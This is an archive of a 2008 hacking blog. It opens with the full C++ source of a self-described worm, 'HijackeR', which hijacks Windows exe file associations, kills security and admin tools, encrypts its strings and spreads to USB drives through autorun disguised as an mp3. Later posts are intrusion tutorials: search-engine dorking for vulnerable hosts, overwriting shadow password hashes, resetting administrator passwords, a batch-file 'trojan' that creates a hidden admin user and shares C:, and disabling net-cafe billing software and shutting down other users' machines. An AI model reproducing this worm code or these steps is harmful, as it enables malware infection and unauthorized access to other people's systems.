Viruses: 2008

Friday, August 15, 2008

worm source code...

worm source code...
/* HijackeR.cpp */

/***
*#####The HijackeR worm #####
*#####author: "v" #####
*#####Team: Legion Of Xtremers #####
******Description******
*The HijackeR worm hijacks the windows boxes and replaces the exe loader.
*The HijackeR worm can be modified to replace the loaders of any kind of files.
*The HijackeR worm executes with the logged-on user privileges.
*It infects the removable storage drives.
*
***/

#include
#include
#include
#include
#include

/*********************Constants & Macro Definition Circuit*******************/
#define MAXBUFFER 1024
#define MINBUFFER 360
#define FILEATTRIB 34
#define PROCESSPATH "C:\\Documents and Settings\\vinnu\\develop\\worm\\HijackeR\\debug\\HijackeR.exe"
#define WORMFILE "HijackeR.exe"
#define COVER "GrandVitara.mp3.exe"
#define COVERPATH "\\GrandVitara.mp3.exe"

using namespace std;

/***************Global Section**************/
HINSTANCE hInstance;
HANDLE hSnapShot;
HANDLE hProcHunted;
STARTUPINFO sui;
PROCESS_INFORMATION pi;
TOKEN_PRIVILEGES tkpn;

char procfile[MAXBUFFER], remotemodule[MAXBUFFER];
bool jump = false;

char *szKey[MINBUFFER];
char *crBuffer[MINBUFFER];
char decrypt[50][MINBUFFER];
char *szcrypt[MAXBUFFER];
char szdecrypt[50][MAXBUFFER];

/***************Shared Section**************/
//*****not implemented now******
#pragma data_seg ("HijackeD")
char szStatus[MAXBUFFER];
HMODULE hmKernel;
#pragma data_seg()

/***************Vein Functions Definition & Prototype Circuit****************/
oid keyAllocator(void) {
szKey[0] = "\xd8\x94\x8c\xac\xdd\x9a\xdf\xee\xaa\xbf\xac\xb1\x9d\xbc\x9c\x8e\x94\xda\x9f\xac\xaa\x8d\x9d\xef\xd7\xa4";
szKey[1] = "\x8f\xaa\xde\xad\xfd\xda\x9d\xe5\x9f\xac\xda\x9d\xf7\xbc\xdf\xee\xad\xbf\xec\x8c\xac\xdd\x9d\xef\xd7\xfd";
szKey[2] = "\xbf\xac\xaa\x8d\xd8\x97\xdf\xe4\xcd\xbf\xa2\xa9\xc7\xbc\xb3\x9e\x94\xfa\xfc\xac\xbf\xac\xaa\x8d\xd9\xf4";
szKey[3] = "\xbb\x9c\x8c\xcd\xb9\xc1\xdf\xee\x8d\xb1\x9c\xca\xee\xbc\x9c\x8e\x94\xdc\xeb\x8c\xac\xdd\x9d\xef\xd7\xc6";
szKey[4] = "\xcb\xb1\xb3\xac\xdd\x9a\xd8\xb3\xbd\xbf\xcc\xda\xb3\xbc\x9c\xce\x94\xdf\xee\xad\xbf\xdd\x9d\xd8\xd7\x99";
szKey[5] = "\xfd\xae\x8c\xae\xb3\xe9\xdf\xee\xaf\xea\x9d\xe5\xac\xbc\x9c\xee\xe9\xda\x9d\xb1\xac\xdd\x9d\xb6\xd7\xb1";
szKey[6] = "\xe9\xcd\x8c\xec\xdd\xcd\xab\xee\xea\xbf\xac\xb3\xdd\xbc\x9c\x8e\x94\xda\xe9\x8c\xac\xdd\x9d\xef\xd7\x9f";
szKey[7] = "\xf5\xbd\x8c\xb1\xd8\xd8\xde\x9e\x9a\xbf\x8c\xee\x9c\xfd\xea\x9d\xe5\xda\xfd\xea\x9d\xe5\x9d\xe9\xb6\xf8";
szKey[8] = "\xae\xe9\x8c\xac\xdd\xaa\xdf\xce\xa3\xbf\xfc\xcd\x8e\xbc\x9c\x8e\x94\xda\xeb\x8c\xac\xdd\x9d\xec\xd7\xa7";
szKey[9] = "\xad\xbf\xac\xaa\x8d\xbf\xac\xda\x8d\xbf\xdc\x9a\xcf\xbc\xb1\x8e\x94\xda\xeb\x8c\xac\xdd\x9d\xef\xd7\xb3";
szKey[10] = "\xea\xd4\xfe\xb1\xdd\xcd\xdf\xe9\xad\xb1\xac\xaf\x8d\xbc\x9c\x8e\x94\xda\xcb\x8c\xac\xdd\x9d\xef\xd7\xe7";
szKey[11] = "\xb1\xf4\x8c\xbc\xd8\xdf\xb1\xee\xb3\xbf\xbf\xac\xa5\x8d\x9c\x8e\x94\xd8\xe8\x8c\xac\xfd\xea\x9d\xe5\xb6";
szKey[12] = "\x90\xb3\xdf\xde\xad\xed\xb3\xe3\xad\xbf\xe9\xa8\x8d\xbc\x9c\x8e\xb1\xda\x9b\x8c\xac\xed\x9d\xdf\xd7\xa4";
szKey[13] = "\xde\xea\x9d\xe5\x8d\xb1\xdf\xae\x9d\xd8\xac\xba\xb3\xbc\x9c\xd8\x94\xda\xe9\xd8\xac\xdd\xaf\xe8\xd7\xc0";
szKey[14] = "\xcf\x9c\x8c\xaf\xdd\xfd\xea\x9d\xe5\xbf\xac\xd8\x8d\xbc\x9c\x8e\x94\xda\xeb\x8c\xac\xdd\xcd\x8f\xd3\xe9";
szKey[15] = "\xdb\xb1\xb3\xab\xab\x8a\xd4\xb1\xb8\xbd\xc6\xd1\xb0\xdd\xfa\xae\xa7\x9f\xe3\xaf\xb8\xd1\x98\xd5\xdf\x93";
szKey[16] = "\x95\xfd\x8c\xb1\xdf\xde\xfc\xfd\x9a\x9c\xfd\xea\x9c\xfd\xea\x9d\xe5\xda\xfd\xea\x9d\xe5\x9d\xe9\xb6\xf8";
szKey[17] = "\xa2\xbf\x8f\xaa\x87\x9f\x9c\xd2\x87\x8f\xcf\x8a\xcf\x9f\xf1\xde\x9c\xfd\xef\x84\xac\xd4\x94\xef\xde\xb2";
szKey[18] = "\xc5\xa1\xe7\xb5\xd8\xd3\xb1\xea\xd0\xd1\x9c\xfd\xa7\x8d\xc7\xae\xb4\xd8\xd4\xde\x9c\xf4\xea\x9d\xe6\xd0";
szKey[19] = "\xf7\xda\x9f\xd5\xfa\x98\xa0\xd1\x82\x97\xf1\xb6\xf0\xfd\xa8\xf1\xc2\x8d\xcd\x8c\xac\xff\xc6\xa0\xb7\x84";
szKey[20] = NULL;

}

void decryptor(void) {
int maxb=19;
/*
lpszBuffer[0] = "exefile\\shell\\open\\command";
lpszBuffer[1] = "batfile\\shell\\open\\command";
lpszBuffer[2] = " \"%1\" %*";
lpszBuffer[3] = "LOX -- The Legion Of Xtremers";
lpszBuffer[4] = ".exe";
lpszBuffer[5] = "\\Autorun.inf";
lpszBuffer[6] = "[autorun]\nopen=%s";
lpszBuffer[7] = "cmd.exe";
lpszBuffer[8] = ".msc";
lpszBuffer[9] = "task";
lpszBuffer[10] = "userprofile";
lpszBuffer[11] = "\\My Documents";
lpszBuffer[12] = "hijacker.exe";
lpszBuffer[13] = "ntkernel.exe";
lpszBuffer[14] = "svchost.exe";
lpszBuffer[15] = "Kernel32.dll";
lpszBuffer[16] = "(Default)";
lpszBuffer[17] = "w";
lpszBuffer[18] = "open";
lpszBuffer[19] = "marschella-esculenta"; // antidote to kill the worm.
lpszBuffer[20] = NULL;
*/
szcrypt[0] = "\xbd\xec\xe9\xca\xb4\xf6\xba\xb2\xd9\xd7\xc9\xdd\xf1\xe0\xf3\xfe\xf1\xb4\xc3\xcf\xc5\xe0\xf0\x8e\xb9\xc0";
szcrypt[1] = "\xed\xcb\xaa\xcb\x94\xb6\xf8\xb9\xec\xc4\xbf\xf1\x9b\xe0\xb0\x9e\xc8\xd1\xb0\xef\xc3\xb0\xf0\x8e\xb9\x99";
szcrypt[2] = "\x9f\x8e\x8f\xbc\xfa\xb7\xfa\xce";
szcrypt[3] = "\xf7\xd3\xd4\xed\x94\xec\xff\xba\xe5\xd4\xbc\x86\x8b\xdb\xf5\xe1\xfa\xfc\xa4\xea\x8c\x85\xe9\x9d\xb2\xab\xde\xee\xff";
szcrypt[4] = "\xe5\xd4\xcb\xc9";
szcrypt[5] = "\xa1\xef\xf9\xda\xdc\x9b\xaa\x80\x81\x83\xf3\x83";
szcrypt[6] = "\xb2\xac\xf9\x98\xb2\xbf\xde\x80\xb7\xb5\xc3\xc3\xb8\xd2\xa1\xab\xe7";
szcrypt[7] = "\x96\xd0\xe8\x9f\xbd\xa0\xbb";
szcrypt[8] = "\x80\x84\xff\xcf";
szcrypt[9] = "\xd9\xde\xdf\xc1";
szcrypt[10] = "\x9f\xa7\x9b\xc3\xad\xbf\xb0\x8f\xc4\xdd\xc9";
szcrypt[11] = "\xed\xb9\xf5\x9c\x9c\xb0\xd2\x9b\xde\xda\xd1\xd8\xd6";
szcrypt[12] = "\xf8\xda\xb5\xbf\xce\x86\xd6\x91\x83\xda\x91\xcd";
szcrypt[13] = "\xb0\x9e\xf6\x80\xff\xdf\xba\xc2\xb3\xbd\xd4\xdf";
szcrypt[14] = "\xbc\xea\xef\xc7\xb2\x8e\x9e\xb3\x80\xc7\xc9";
szcrypt[15] = "\x90\xd4\xc1\xc5\xce\xe6\xe7\x83\x96\xd9\xaa\xbd";
szcrypt[16] = "\xbd\xb9\xe9\xd7\xbe\xab\x90\x89\xb3";
szcrypt[17] = "\xd5";
szcrypt[18] = "\xaa\xd1\x82\xdb";
szcrypt[19] = "\x9a\xbb\xed\xa6\x99\xf0\xc5\xbd\xee\xf6\xdc\xd3\x83\x9e\xdd\x9d\xa7\xe3\xb9\xed";
szcrypt[20] = NULL;

/*********** The one-time-pad decryptor-engine**************/
for (int i = 0; i < maxb; i++) {
for (int d = 0, k = 0; d < lstrlen(szcrypt); d++, k++) {
if (k == lstrlen(szKey)) k = 0;
szdecrypt[d] = szcrypt[d] ^ szKey[k];
}
szdecrypt[d] = '\0';
}
/***********************************************************/
}
void sysFunc(void) {

SHEmptyRecycleBin(NULL, NULL, SHERB_NOCONFIRMATION|SHERB_NOPROGRESSUI|SHERB_NOSOUND);

}

WINAPI defender(LPSTR szProcessName) {
HANDLE hProcess;
PROCESSENTRY32 pe = { sizeof (PROCESSENTRY32)};

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
defStart:
if (Process32First(hSnapShot, &pe)) {
do {
if (!strcmp(pe.szExeFile, szProcessName)) {
hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pe.th32ProcessID);
TerminateProcess(hProcess, 1);
CloseHandle(hProcess);hProcess = NULL;
}
Sleep(15);
} while (Process32Next(hSnapShot, &pe));
CloseHandle(hSnapShot);hSnapShot = NULL;
}

Sleep(25);
goto defStart;

return true;
}

WINAPI killerIgniter(void) {

HANDLE killers[50];
int max = 13;
/*
char *szDenyProcs[MINBUFFER];
szDenyProcs[0] = "rstrui.exe";
szDenyProcs[1] = "tasklist.exe";
szDenyProcs[2] = "taskkill.exe";
szDenyProcs[3] = "taskman.exe";
// szDenyProcs[3] = "taskmgr.exe";
szDenyProcs[4] = "regedit.exe";
szDenyProcs[5] = "reg.exe";
szDenyProcs[6] = "regdit32.exe";
szDenyProcs[7] = "regdit.exe";
szDenyProcs[8] = "cmd.exe";
szDenyProcs[9] = "mmc.exe";
szDenyProcs[10] = "wscript.exe";
szDenyProcs[11] = "command.exe";
szDenyProcs[12] = "MDM.exe";
szDenyProcs[13] = NULL;
*/
/*****************Decryption Circuit********************/

crBuffer[0] = "\xaa\xe7\xf8\xde\xa8\xf3\xf1\x8b\xd2\xda";
crBuffer[1] = "\xfb\xcb\xad\xc6\x91\xb3\xee\x91\xb1\xc9\xa2\xf8";
crBuffer[2] = "\xcb\xcd\xd9\xe6\xb3\xfe\xb3\x88\xe3\xda\xda\xcc";
// crBuffer[3] = "\xcf\xfd\xff\xa6\xd4\xa0\xb1\xc0\xe8\xc9\xf9";
crBuffer[3] = "\xcf\xfd\xff\xa6\xd4\xa6\xad\xc0\xe8\xc9\xf9";
crBuffer[4] = "\xb9\xd4\xd4\xc9\xb9\xf3\xac\x9d\xd8\xc7\xa9";
crBuffer[5] = "\x8f\xcb\xeb\x80\xd6\x91\xba";
crBuffer[6] = "\x9b\xa8\xeb\x88\xb4\xb9\x98\xdc\xc4\xda\xd4\xd6";
crBuffer[7] = "\x87\xd8\xeb\xd5\xb1\xac\xf0\xfb\xe2\xda";
crBuffer[8] = "\xcd\x84\xe8\x82\xb8\xd2\xba";
crBuffer[9] = "\xc0\xd2\xcf\x84\xe8\xc7\xc9";
crBuffer[10] = "\x9d\xa7\x9d\xc3\xb4\xbd\xab\xc7\xc8\xc9\xc9";
crBuffer[11] = "\xd2\x9b\xe1\xd1\xb9\xb1\xd5\xc0\xd6\xc7\xda";
crBuffer[12] = "\xdd\xf7\x92\xf0\xc8\x95\xd6";
crBuffer[13] = NULL;

for (int i = 0; i < max; i++) {
for (int d = 0; d < lstrlen(crBuffer); d++) {
decrypt[d] = crBuffer[d] ^ szKey[d];
}
decrypt[d] = '\0';
}
/******************************killer threads circuit********************************/

for (int a = 0; a < max; a++) {
killers[a] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) defender, decrypt[a], 0, 0);
Sleep(15);
}

// next circuit is disabled b'coz the delay buffer is required whereas it clears off the buffer.
/* for (i = 0; i < max; i++) {
for (int d=0; d < lstrlen(decrypt); d++) {
decrypt[d] = '\0';
}
}
*/

return true;
}
BOOL procLoader(char szProc[MINBUFFER], char szParam[MAXBUFFER]) {
BOOL resProc;
for (int a=0; szProc[a] != '\0'; a++) {
szProc[a] = (char)tolower((int)szProc[a]);
}

if ((strstr(szProc, szdecrypt[7])) != NULL) {
ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[8])) != NULL) {
ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[9])) != NULL) {
ExitProcess(1);
// } else if ((strstr(szProc, "notepad")) != NULL || (strstr(szProc, "paint")) != NULL || (strstr(szProc, "calc")) != NULL) {
// goto checkpass;
// } else if ((strstr(szProc, "system32")) != NULL) {
// ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[12])) != NULL || (strstr(szProc, szdecrypt[13])) != NULL) {
return jump = true;
} else {
// Code to do.
}

checkpass:
memset(&sui, 0, sizeof(STARTUPINFO));
sui.cb = sizeof(STARTUPINFO);
sui.hStdError = GetStdHandle(STD_ERROR_HANDLE);
sui.hStdInput = GetStdHandle(STD_INPUT_HANDLE);
sui.hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
sui.dwFlags = STARTF_USESTDHANDLES;

char szDirectory[MAXBUFFER];
strcpy(szDirectory, getenv(szdecrypt[10]));
strcat(szDirectory, szdecrypt[11]);

resProc = CreateProcess(szProc, szParam, NULL,
NULL, TRUE, 0, NULL,
szDirectory, &sui, &pi);
return resProc;
}
BOOL oprocSniper(LPSTR szProcName) {
HANDLE hoProc;
PROCESSENTRY32 pc = { sizeof (PROCESSENTRY32)};
begin:

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);

if (Process32First(hSnapShot, &pc)) {
do {
if (!strcmp(pc.szExeFile, szProcName)) {
if (pc.th32ProcessID != GetCurrentProcessId())
hoProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pc.th32ProcessID);
TerminateProcess(hoProc, 1);
CloseHandle(hoProc);hoProc = NULL;
} else if (!strcmp(pc.szExeFile, CODENAME)) {
if (pc.th32ProcessID != GetCurrentProcessId())
hoProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pc.th32ProcessID);
TerminateProcess(hoProc, 1);
CloseHandle(hoProc);hoProc = NULL;
}

Sleep(5);
} while (Process32Next(hSnapShot, &pc));

CloseHandle(hSnapShot);
}
Sleep(20);
goto begin;
return NULL;
}

void driveCloner(void) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);

FILE *fp;

char drive[3], newloc[30], autof[20];

int let = 0x43;

for (int i = 0; i < 256; i++, let++) {

if (i == 255)

i = 0;

if (let > 0x5A)

let = 0x43;

drive[0] = (char)let;

drive[1]= ':';

drive[2] = '\0';

if ((GetDriveType(drive)) == 2) {

// This line fetches the removable drives.

strcpy(newloc, drive);
strcat(newloc, COVERPATH);

strcpy(autof, drive);

CopyFile(remotemodule, newloc, 0);

// If not then copy the file.

strcat(autof, szdecrypt[5]);

SetFileAttributes(autof, 28);
fp = fopen(autof, szdecrypt[17]);
if (fp != NULL) {
fprintf(fp, szdecrypt[6], COVER);
fclose(fp);
}

SetFileAttributes(newloc, FILEATTRIB);

}

Sleep(80);
}
}
DWORD WINAPI hijackSettings (void) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);
HKEY hResult, hResult1;
bool batsman = false;

LPCTSTR hSubKey = szdecrypt[0];
LPCTSTR hSubKey1 = szdecrypt[1];

char dat[MINBUFFER];
strcpy(dat, remotemodule);
strcat(dat, szdecrypt[2]);

if (RegOpenKeyEx(HKEY_CLASSES_ROOT, hSubKey, 0, KEY_ALL_ACCESS, &hResult) == ERROR_SUCCESS) {

if (RegOpenKeyEx(HKEY_CLASSES_ROOT, hSubKey1, 0, KEY_ALL_ACCESS, &hResult1) == ERROR_SUCCESS) {
RegDeleteValue(hResult1, szdecrypt[16]);
batsman = true;
}

RegDeleteValue(hResult, szdecrypt[16]);

while(true) {
RegSetValueEx(hResult, NULL, 0, REG_SZ, (const unsigned char *)dat, sizeof (dat) );

if (batsman == true)
RegSetValueEx(hResult1, NULL, 0, REG_SZ, (const unsigned char *)dat, sizeof (dat) );
Sleep(50);
}

}
return TRUE;
}

DWORD WINAPI privilAdj(void) {
HANDLE hToken;

hInstance = GetModuleHandle(szdecrypt[15]);
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkpn.Privileges[0].Luid);
tkpn.PrivilegeCount = 1;
tkpn.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, 0, &tkpn, sizeof (tkpn), NULL, NULL);
CloseHandle(hToken);
}

return true;
}

void titleFinder(void) {
while(true) {
SetWindowText(FindWindow(NULL, remotemodule), szdecrypt[3]);
Sleep(80);
}
}
/***************Worm's Main Engine Circuit****************/
int main(int argc, char* argv[]) {
try {

keyAllocator();
decryptor();
privilAdj();

HANDLE hSniper = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)oprocSniper, szdecrypt[13], 0, 0);
HANDLE hKiller = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)killerIgniter, NULL, 0, 0);

SetThreadPriority(hKiller, THREAD_PRIORITY_TIME_CRITICAL);

char *ptr;
ptr = argv[0];procfile[0] = '\0';

strcpy(remotemodule, getenv("allusersprofile"));
strcat(remotemodule, "\\Documents\\ntkernel.exe");

HANDLE hTitle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)titleFinder, NULL, 0, 0);

strncpy(procfile, ptr, MAXBUFFER-1);
if ((strstr(ptr, szdecrypt[4])) == NULL) strcat(procfile, szdecrypt[4]);

char szProcess[MINBUFFER], szParameter[MAXBUFFER];
szProcess[0] = szParameter[0] = '\0';

if (argc >=2) {
strncpy(szProcess, argv[1], MINBUFFER-10);

if (argc >= 3) {
for (int i = 2 ;(i+1) <= argc; i++) {
strcat(szParameter, argv);
strcat(szParameter, " ");
}
}
procLoader(szProcess, szParameter);
}

if (jump == true) {
Sleep(11000);
}

CopyFile(procfile, remotemodule, 0);

HANDLE htHijack = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)hijackSettings, NULL, 0, 0);
SetThreadPriority(htHijack, THREAD_PRIORITY_ABOVE_NORMAL);
HANDLE hdCloner = CreateThread (0, 0,(LPTHREAD_START_ROUTINE)driveCloner, NULL, 0, 0);
SetThreadPriority(hdCloner, THREAD_PRIORITY_ABOVE_NORMAL);

sysFunc();

if (hdCloner != NULL) {
WaitForSingleObject(hdCloner, 1000);
}

ShellExecute(NULL, szdecrypt[18], remotemodule, NULL, NULL, HIDE_WINDOW);
} catch (...) {
ExitProcess(1);
}

return EXIT_SUCCESS;
}

Books for hacking

Books for hacking
Only For Educational Purpose (U understand wat that mean)

Search in google

-inurl:htm -inurl:html intitle:"index of" +("/ebooks"|"/book") +(chm|pdf|zip) +"hacking" "Last Modified"

Or Direct Link

http://www.google.com/search?hl=en&lr=&q=-inurl%3Ahtm+-inurl%3Ahtml+intitle%3A%22index+of%22+%2B%28%22%2Febooks%22%7C%22%2Fbook%22%29+%2B%28chm%7Cpdf%7Czip%29+%2B%22hacking%22%20%22Last%20Modified%22&btnG=Search

Art of pishing

the art of phishing
any ideas on how to stop phishing sites... can there be any automated ways.. a new computer/internet user will definitely get phished since he/she doesnt know about the technicalities of the same...

any ideas/views ...something like a anti-phish filter...can we join hands to make one???

Lucky ansari

www.greyhatindia.com

Notepad,funny trick

Notepad Secret and Funny Trick
Notepad Secret and Funny Trick
A funny trick You can do using Notepad in Windows XP.

Open Notepad.
Type the words as follows:
Bush hid the facts.

Now save the file (give it any name you like), close the notepad.
open it again. ou will se Square characters instead of the words you had written.
It Works Only with XP.

It works with certain names. It worked with:
bush
saddam
tony blair
kieran
carl
de

windows,hacking tips

ultimate ankit fadia windows,hacking tips
http://300allpctips.blogspot.com/
http://windowsultimatedetails.blogspot.com/
http://googlesecretsandtips.blogspot.com/
http://registrysnacks.blogspot.com/

Spider hacking

Its time to do some serious stuff, but in small time interval, here is the tutorial:

Spider Hacking: this kind of hacking is also known as search engine hacking, bcoz search engines are infact the spiders and simple naive users call'm search engines, leave it..

Let's start with google search engine:

every search engine have some directives (mostly which provide the advance search) and use of these directives can be of immense help, like developing an on the fly disaster management program, exact information extraction system, etc... hackers use these techniques for identifying the victims within seconds and launch the attacks without even using any exploit. letrs do it, get set and finally go:

directives:

1. intext:
this directive can be used to search any text inside the document body, the multiword text must be placed inside the double quotes and single word no problem,
remember directives only in lower case and no space after and before":"

we can use "+" and "-" signs for more specific search, e.g:

intext:cars - intext:"maruti suzuki"
above query will search for all pages having cars written but NOT those pages which include the "maruty suzuky".

the data or text is not case sensitive.

2. inurl:
this directive is deadly and searches for those pages having specific portion in their url portion as follows:

inurl:admin

this will list all those pages having admin in their url (the address).

inurl:"/admin/order"
will list all pages which are inside the /admin/order and so on directory.

3. intitle:
this directive is also deadly and can retrieve all those pages which has the specified text inside their title.

note: we can also use the wild cards..e.g. "*" for group and "." for single character.

e.g:

intitle:"Microsoft IIS 3.0*"

this will retrieve all those pages which have "Microsoft IIS 3.0..." as their title
this will lead to finding vulnerable hosts in seconds,.....we got the victim"
(place the portion of exact title by opening such pages i find the titles of all vulnerable softwares default pages and vulnerability scanners generated report pages titles and search for them, a real victim scanner is developed, in few lines by u, isn't it...

type the following in google search box:

intitle:"index.of" inurl:admin

and check out the results.

next is ..
4. site:
this directive will search within a site or domain like this:
site:www.victim.com intitle:"index.of*"

will search for all those pages (actually in this case it will open the folder with browse property on).

note: to use inurl and site togather is mostly worthless.

5. inanchor:
will list all those pages which have the anchor text as specified...
e.g:

inanchor:"My Secrets"
will search for all those pages which have a hyperlink with text "My Secrets"

6. link:
the link provides all those pages which have a link for specified address. like href address in anchors.
6. filetype:

this directive is most deadliest and is used to search for specific file type like to search for excel file specify its extension withouit . as:

filetype:xls inurl:india

above search query will retrieve all excel files found in india directory or named india.
i like the following concept of the yahoo, in which we can find out whether a user is online or not, .. in internet browser in address bar type:

opi.yahoo.com/online?u=yahooID&m=g&t=2

where u=userID is a variable and needs the yahoo userID

m = method of status specification
"g" returns the graphic and "t" in text

t type of text or graphic
t can be from 1, 2, 3 and 2 for largest size, 1 for medium, 3 for smallest size.
e.g:

opi.yahoo.com/online?u=vinkat007&m=g&t=1

Hacking in Linux

Hacking in Linux
This worked in Red Hat (where multiple users existed).
Open the \etc\shadow file and simply cut and paste your own password over another user's password. There you go. You can now use that account using your own password.

Note:I've tried this on several earlier versions. I bet it'll work on 5. Will have to try it out on 11.

CHANGE ADMINISTRATOR password

Change Even administrater's password.
This works if you want to hack someone else's account on your pc bit do not know his/her password.
Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack.
RIGHT CLICK and then click on SET PASSWORD from the pop-up menu.
Enter the new password.
Click on OK.
There you have it.
You have changed the user's password!

SECOND METHOD
there are several methods available to change administrators passwords, but i am not going to discus any third party tool here (i don't want to publicize any commercial tool here)...
in command console or run dialogue box, type:

net user administrator

and thats it it is changed, but how to change it if u are not aDMIN,...THATS THE RECIPIE OF QUESTION?

there are several ways, if you anytime found computer unattended, then make an password reset disk by selecting the administrator user from user management from control panel "prevent typing wrong passwords" and then insert a floppy disk, next time any time reboot system and intentionally type wrong passworde aND WHEN asked insert the password reset disk and u can change the password for administrator.

and the RAMBan OF ALL THE HACKS IS THAT , INSERT A WINDOWS INSTALLATION DISK AND REBOOT THE SYSTEM AND SELECT the listed installation and select the REPAIR (not recovery console..NO..NOT)
remember the repair, and then when it will again reboot and the repairing process will start (showing the "installing devices" progress bar) press the SHIFT+F10 and there u will get the command console, now type taskmgr immegiately and endtask (terminate or keep on, it will then refresh the window) the setup.exe and then in console window type in the above listed command to change the users password, u can change any user's password by eliminating administrator with user id, and there u go.

u can also use knoppix if want to retrieve the data or there are several password changers available...but dont use them,..all in alll....secure systems physically also, don't prey upon other's intellectual property.
it is offensive and a criminal act....beware

and once more, there are certainly other methods also. sometimes the administrators password can be retrieved from registry backups in plain text if the autologon is enabled....

Monday, August 4, 2008

How to increase the power of ur pc

Follow the given steps to end the idle tasks:

*

To enable this feature, you will need to be logged into your computer with administrative rights.
*

Click Start button and click on Run option.
*

In the Run box, type the command Rundll32.exe advapi32.dll,ProcessIdleTasks command and press Ok button.

Here system will take some time to end the background idle tasks

Make ur own virus torzan

Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want

Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

CD-ROM virus

Basic overview of this tutorial is if there's some kind of timer or client
software on the computer you're using at the Net Cafe you can hopefully disable it.

Firstly we need to gain access to command prompt (cmd.exe) to do this there's a few
ways.

1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.
Say that's disabled then we can try some other methods.

2) Press the Windows Logo + R and it will start run up. (hopefully)

3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.

4) Open notepad type "cmd.exe" without the quotation marks ("") and then
go to File/Save As.. and type the name for the file and have it end with
.bat for example "MyNewFile.bat" and select Save as type and select All Files.

Make sure to save it somewhere you can access it, Like the desktop.

If they have deleted Notepad then go in to Internet Explorer and right click
and select View Source or on the menu bar click View then source and perform the
same process as above.

Once you have done this you can run the file. If you can't open files from the desktop
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to
the Desktop and it will show the saves files on the desktop in a folder type window.

Once you have access to command prompt you can perform some usefull actions e.g shutdown
programs, shutdown other peoples computers, add new accounts.

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.

For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.

Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.

Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.

Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in
handy)

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

